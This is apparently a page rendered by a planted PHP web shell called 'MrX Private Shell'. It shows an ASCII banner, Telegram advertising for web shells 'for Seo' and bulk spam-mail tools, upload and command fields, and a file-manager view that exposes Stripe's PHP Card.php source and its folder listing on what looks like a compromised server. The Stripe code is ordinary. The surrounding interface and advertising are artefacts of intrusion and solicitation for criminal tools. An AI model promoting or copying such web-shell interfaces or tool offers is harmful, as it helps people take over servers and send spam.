__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php

// File generated from our OpenAPI spec

namespace AmeliaStripe;

/**
 * You can store multiple cards on a customer in order to charge the customer
 * later. You can also store multiple debit cards on a recipient in order to
 * transfer to those cards later.
 *
 * Related guide: <a href="https://stripe.com/docs/sources/cards">Card payments with Sources</a>
 *
 * @property string $id Unique identifier for the object.
 * @property string $object String representing the object's type. Objects of the same type share the same value.
 * @property null|Account|string $account
 * @property null|string $address_city City/District/Suburb/Town/Village.
 * @property null|string $address_country Billing address country, if provided when creating card.
 * @property null|string $address_line1 Address line 1 (Street address/PO Box/Company name).
 * @property null|string $address_line1_check If <code>address_line1</code> was provided, results of the check: <code>pass</code>, <code>fail</code>, <code>unavailable</code>, or <code>unchecked</code>.
 * @property null|string $address_line2 Address line 2 (Apartment/Suite/Unit/Building).
 * @property null|string $address_state State/County/Province/Region.
 * @property null|string $address_zip ZIP or postal code.
 * @property null|string $address_zip_check If <code>address_zip</code> was provided, results of the check: <code>pass</code>, <code>fail</code>, <code>unavailable</code>, or <code>unchecked</code>.
 * @property null|string $allow_redisplay This field indicates whether this payment method can be shown again to its customer in a checkout flow. Stripe products such as Checkout and Elements use this field to determine whether a payment method can be shown as a saved payment method in a checkout flow. The field defaults to “unspecified”.
 * @property null|string[] $available_payout_methods A set of available payout methods for this card. Only values from this set should be passed as the <code>method</code> when creating a payout.
 * @property string $brand Card brand. Can be <code>American Express</code>, <code>Diners Club</code>, <code>Discover</code>, <code>Eftpos Australia</code>, <code>Girocard</code>, <code>JCB</code>, <code>MasterCard</code>, <code>UnionPay</code>, <code>Visa</code>, or <code>Unknown</code>.
 * @property null|string $country Two-letter ISO code representing the country of the card. You could use this attribute to get a sense of the international breakdown of cards you've collected.
 * @property null|string $currency Three-letter <a href="https://www.iso.org/iso-4217-currency-codes.html">ISO code for currency</a> in lowercase. Must be a <a href="https://docs.stripe.com/currencies">supported currency</a>. Only applicable on accounts (not customers or recipients). The card can be used as a transfer destination for funds in this currency. This property is only available when returned as an <a href="/api/external_account_cards/object">External Account</a> where <a href="/api/accounts/object#account_object-controller-is_controller">controller.is_controller</a> is <code>true</code>.
 * @property null|Customer|string $customer The customer that this card belongs to. This attribute will not be in the card object if the card belongs to an account or recipient instead.
 * @property null|string $cvc_check If a CVC was provided, results of the check: <code>pass</code>, <code>fail</code>, <code>unavailable</code>, or <code>unchecked</code>. A result of unchecked indicates that CVC was provided but hasn't been checked yet. Checks are typically performed when attaching a card to a Customer object, or when creating a charge. For more details, see <a href="https://support.stripe.com/questions/check-if-a-card-is-valid-without-a-charge">Check if a card is valid without a charge</a>.
 * @property null|bool $default_for_currency Whether this card is the default external account for its currency. This property is only available for accounts where <a href="/api/accounts/object#account_object-controller-requirement_collection">controller.requirement_collection</a> is <code>application</code>, which includes Custom accounts.
 * @property null|string $dynamic_last4 (For tokenized numbers only.) The last four digits of the device account number.
 * @property int $exp_month Two-digit number representing the card's expiration month.
 * @property int $exp_year Four-digit number representing the card's expiration year.
 * @property null|string $fingerprint <p>Uniquely identifies this particular card number. You can use this attribute to check whether two customers who’ve signed up with you are using the same card number, for example. For payment methods that tokenize card information (Apple Pay, Google Pay), the tokenized number might be provided instead of the underlying card number.</p><p><em>As of May 1, 2021, card fingerprint in India for Connect changed to allow two fingerprints for the same card---one for India and one for the rest of the world.</em></p>
 * @property string $funding Card funding type. Can be <code>credit</code>, <code>debit</code>, <code>prepaid</code>, or <code>unknown</code>.
 * @property string $last4 The last four digits of the card.
 * @property null|StripeObject $metadata Set of <a href="https://stripe.com/docs/api/metadata">key-value pairs</a> that you can attach to an object. This can be useful for storing additional information about the object in a structured format.
 * @property null|string $name Cardholder name.
 * @property null|(object{preferred: null|string}&StripeObject) $networks
 * @property null|string $regulated_status Status of a card based on the card issuer.
 * @property null|string $status For external accounts that are cards, possible values are <code>new</code> and <code>errored</code>. If a payout fails, the status is set to <code>errored</code> and <a href="https://stripe.com/docs/payouts#payout-schedule">scheduled payouts</a> are stopped until account details are updated.
 * @property null|string $tokenization_method If the card number is tokenized, this is the method that was used. Can be <code>android_pay</code> (includes Google Pay), <code>apple_pay</code>, <code>masterpass</code>, <code>visa_checkout</code>, or null.
 */
class Card extends ApiResource
{
    const OBJECT_NAME = 'card';

    const ALLOW_REDISPLAY_ALWAYS = 'always';
    const ALLOW_REDISPLAY_LIMITED = 'limited';
    const ALLOW_REDISPLAY_UNSPECIFIED = 'unspecified';

    const REGULATED_STATUS_REGULATED = 'regulated';
    const REGULATED_STATUS_UNREGULATED = 'unregulated';

    /**
     * Delete a specified external account for a given account.
     *
     * @param null|array $params
     * @param null|array|string $opts
     *
     * @return Card the deleted resource
     *
     * @throws Exception\ApiErrorException if the request fails
     */
    public function delete($params = null, $opts = null)
    {
        self::_validateParams($params);

        $url = $this->instanceUrl();
        list($response, $opts) = $this->_request('delete', $url, $params, $opts);
        $this->refreshFrom($response, $opts);

        return $this;
    }

    /**
     * Possible string representations of the CVC check status.
     *
     * @see https://stripe.com/docs/api/cards/object#card_object-cvc_check
     */
    const CVC_CHECK_FAIL = 'fail';
    const CVC_CHECK_PASS = 'pass';
    const CVC_CHECK_UNAVAILABLE = 'unavailable';
    const CVC_CHECK_UNCHECKED = 'unchecked';

    /**
     * Possible string representations of the funding of the card.
     *
     * @see https://stripe.com/docs/api/cards/object#card_object-funding
     */
    const FUNDING_CREDIT = 'credit';
    const FUNDING_DEBIT = 'debit';
    const FUNDING_PREPAID = 'prepaid';
    const FUNDING_UNKNOWN = 'unknown';

    /**
     * Possible string representations of the tokenization method when using Apple Pay or Google Pay.
     *
     * @see https://stripe.com/docs/api/cards/object#card_object-tokenization_method
     */
    const TOKENIZATION_METHOD_APPLE_PAY = 'apple_pay';
    const TOKENIZATION_METHOD_GOOGLE_PAY = 'google_pay';

    /**
     * @return string The instance URL for this resource. It needs to be special
     *    cased because cards are nested resources that may belong to different
     *    top-level resources.
     */
    public function instanceUrl()
    {
        if ($this['customer']) {
            $base = Customer::classUrl();
            $parent = $this['customer'];
            $path = 'sources';
        } elseif ($this['account']) {
            $base = Account::classUrl();
            $parent = $this['account'];
            $path = 'external_accounts';
        } else {
            $msg = 'Cards cannot be accessed without a customer ID, or account ID.';

            throw new Exception\UnexpectedValueException($msg);
        }
        $parentExtn = \urlencode(Util\Util::utf8($parent));
        $extn = \urlencode(Util\Util::utf8($this['id']));

        return "{$base}/{$parentExtn}/{$path}/{$extn}";
    }

    /**
     * @param array|string $_id
     * @param null|array|string $_opts
     *
     * @throws Exception\BadMethodCallException
     */
    public static function retrieve($_id, $_opts = null)
    {
        $msg = 'Cards cannot be retrieved without a customer ID or an '
               . 'account ID. Retrieve a card using '
               . "`Customer::retrieveSource('customer_id', 'card_id')` or "
               . "`Account::retrieveExternalAccount('account_id', 'card_id')`.";

        throw new Exception\BadMethodCallException($msg);
    }

    /**
     * @param string $_id
     * @param null|array $_params
     * @param null|array|string $_options
     *
     * @throws Exception\BadMethodCallException
     */
    public static function update($_id, $_params = null, $_options = null)
    {
        $msg = 'Cards cannot be updated without a customer ID or an '
               . 'account ID. Update a card using '
               . "`Customer::updateSource('customer_id', 'card_id', "
               . '$updateParams)` or `Account::updateExternalAccount('
               . "'account_id', 'card_id', \$updateParams)`.";

        throw new Exception\BadMethodCallException($msg);
    }

    /**
     * @param null|array|string $opts
     *
     * @return static the saved resource
     *
     * @throws Exception\ApiErrorException if the request fails
     *
     * @deprecated The `save` method is deprecated and will be removed in a
     *     future major version of the library. Use the static method `update`
     *     on the resource instead.
     */
    public function save($opts = null)
    {
        $params = $this->serializeParameters();
        if (\count($params) > 0) {
            $url = $this->instanceUrl();
            list($response, $opts) = $this->_request('post', $url, $params, $opts, ['save']);
            $this->refreshFrom($response, $opts);
        }

        return $this;
    }
}

Filemanager

Name Type Size Permission Actions
ApiOperations Folder 0750
Apps Folder 0750
Billing Folder 0750
BillingPortal Folder 0750
Checkout Folder 0750
Climate Folder 0750
Entitlements Folder 0750
EventData Folder 0750
Events Folder 0750
Exception Folder 0750
FinancialConnections Folder 0750
Forwarding Folder 0750
HttpClient Folder 0750
Identity Folder 0750
Issuing Folder 0750
Radar Folder 0750
Reporting Folder 0750
Service Folder 0750
Sigma Folder 0750
Tax Folder 0750
Terminal Folder 0750
TestHelpers Folder 0750
Treasury Folder 0750
Util Folder 0750
V2 Folder 0750
Account.php File 41.57 KB 0640
AccountLink.php File 1.74 KB 0640
AccountSession.php File 7.13 KB 0640
ApiRequestor.php File 22.76 KB 0640
ApiResource.php File 3.41 KB 0640
ApiResponse.php File 724 B 0640
ApplePayDomain.php File 3.16 KB 0640
Application.php File 394 B 0640
ApplicationFee.php File 5.66 KB 0640
ApplicationFeeRefund.php File 2.44 KB 0640
Balance.php File 3.54 KB 0640
BalanceTransaction.php File 9.1 KB 0640
BankAccount.php File 9.57 KB 0640
BaseStripeClient.php File 18.53 KB 0640
BaseStripeClientInterface.php File 1.16 KB 0640
Capability.php File 4.18 KB 0640
Card.php File 10.68 KB 0640
CashBalance.php File 2.45 KB 0640
Charge.php File 29.38 KB 0640
Collection.php File 8.44 KB 0640
ConfirmationToken.php File 11.24 KB 0640
ConnectCollectionTransfer.php File 915 B 0640
CountrySpec.php File 2.91 KB 0640
Coupon.php File 8.1 KB 0640
CreditNote.php File 12.06 KB 0640
CreditNoteLineItem.php File 2.39 KB 0640
Customer.php File 24.37 KB 0640
CustomerBalanceTransaction.php File 5.65 KB 0640
CustomerCashBalanceTransaction.php File 3.69 KB 0640
CustomerSession.php File 3.35 KB 0640
Discount.php File 2.82 KB 0640
Dispute.php File 11.79 KB 0640
EphemeralKey.php File 2.06 KB 0640
ErrorObject.php File 15.97 KB 0640
Event.php File 39.27 KB 0640
ExchangeRate.php File 3.43 KB 0640
File.php File 5.21 KB 0640
FileLink.php File 3.99 KB 0640
FundingInstructions.php File 4.28 KB 0640
Invoice.php File 36.06 KB 0640
InvoiceItem.php File 8.76 KB 0640
InvoiceLineItem.php File 5.88 KB 0640
InvoicePayment.php File 3.32 KB 0640
InvoiceRenderingTemplate.php File 3.84 KB 0640
LineItem.php File 1.47 KB 0640
LoginLink.php File 828 B 0640
Mandate.php File 2.91 KB 0640
OAuth.php File 3.3 KB 0640
OAuthErrorObject.php File 917 B 0640
PaymentIntent.php File 48.19 KB 0640
PaymentLink.php File 15.99 KB 0640
PaymentMethod.php File 19.09 KB 0640
PaymentMethodConfiguration.php File 18.9 KB 0640
PaymentMethodDomain.php File 5.49 KB 0640
Payout.php File 11.7 KB 0640
Person.php File 10.37 KB 0640
Plan.php File 9.58 KB 0640
Price.php File 11.15 KB 0640
Product.php File 11.32 KB 0640
ProductFeature.php File 1008 B 0640
PromotionCode.php File 5.92 KB 0640
Quote.php File 15.3 KB 0640
Reason.php File 196 B 0640
RecipientTransfer.php File 908 B 0640
Refund.php File 10.96 KB 0640
RelatedObject.php File 223 B 0640
RequestTelemetry.php File 762 B 0640
ReserveTransaction.php File 712 B 0640
Review.php File 5.14 KB 0640
SearchResult.php File 6.48 KB 0640
SetupAttempt.php File 6.43 KB 0640
SetupIntent.php File 21.77 KB 0640
ShippingRate.php File 5.42 KB 0640
SingletonApiResource.php File 730 B 0640
Source.php File 19.96 KB 0640
SourceMandateNotification.php File 2.66 KB 0640
SourceTransaction.php File 2.93 KB 0640
Stripe.php File 7.63 KB 0640
StripeClient.php File 4.52 KB 0640
StripeClientInterface.php File 1.5 KB 0640
StripeObject.php File 19.05 KB 0640
StripeStreamingClientInterface.php File 244 B 0640
Subscription.php File 27.83 KB 0640
SubscriptionItem.php File 7.97 KB 0640
SubscriptionSchedule.php File 13.58 KB 0640
TaxCode.php File 1.88 KB 0640
TaxDeductedAtSource.php File 733 B 0640
TaxId.php File 10.32 KB 0640
TaxRate.php File 7.52 KB 0640
ThinEvent.php File 1.12 KB 0640
Token.php File 9.2 KB 0640
Topup.php File 6.33 KB 0640
Transfer.php File 8.94 KB 0640
TransferReversal.php File 3.24 KB 0640
Webhook.php File 1.49 KB 0640
WebhookEndpoint.php File 6.24 KB 0640
WebhookSignature.php File 4.28 KB 0640
Filemanager